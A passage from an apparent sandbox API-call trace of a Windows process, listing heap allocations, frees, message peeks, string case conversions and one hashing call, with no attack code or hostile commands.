(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.054] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0190.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.055] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.055] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.055] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.055] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.055] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0190.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0190.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0190.056] CryptHashData (hHash=0xaa58a0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.056] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.057] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.057] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0190.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0190.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.058] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.059] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0190.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0190.060] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0190.061] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.061] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa628 [0190.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.062] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.062] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.062] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0190.062] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.063] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.063] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.063] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.063] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.064] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.064] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.064] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0190.065] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0190.065] 